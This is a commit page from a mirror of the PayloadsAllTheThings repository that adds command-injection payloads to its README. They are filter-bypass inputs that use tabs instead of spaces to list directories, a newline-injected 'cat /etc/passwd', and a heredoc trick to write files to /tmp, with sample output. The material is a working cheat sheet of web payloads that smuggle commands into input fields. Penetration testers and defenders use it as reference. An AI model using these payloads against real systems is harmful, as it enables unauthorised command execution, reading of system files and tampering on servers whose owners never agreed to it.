Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Command Injection space alternatives

Browse source
This commit is contained in:
int0x80 2022-01-14 18:39:52 -06:00
parent f23412d67a
commit 171a6f2b21
1 changed files with 18 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
Command Injection/README.md
View file

@ -96,6 +96,16 @@ Commands execution without spaces, $ or { } - Linux (Bash only)
IFS=,;`cat<<<uname,-a`
```
Tabs work as separators in web apps where spaces are removed.
```powershell
;ls%09-al%09/home
drwxr-xr-x 4 root root 4096 Jan 10 13:34 .
drwxr-xr-x 18 root root 4096 Jan 10 13:33 ..
drwx------ 2 root root 16384 Jan 10 13:31 lost+found
drwxr-xr-x 4 test test 4096 Jan 13 08:30 test
```
Works on Windows only.
```powershell
@ -109,6 +119,14 @@ ping%PROGRAMFILES:~10,-5%IP
something%0Acat%20/etc/passwd
```
You can also write files.
```powershell
;cat>/tmp/hi<<EOF%0ahello%0aEOF
;cat</tmp/hi
hello
```
### Bypass characters filter via hex encoding
Linux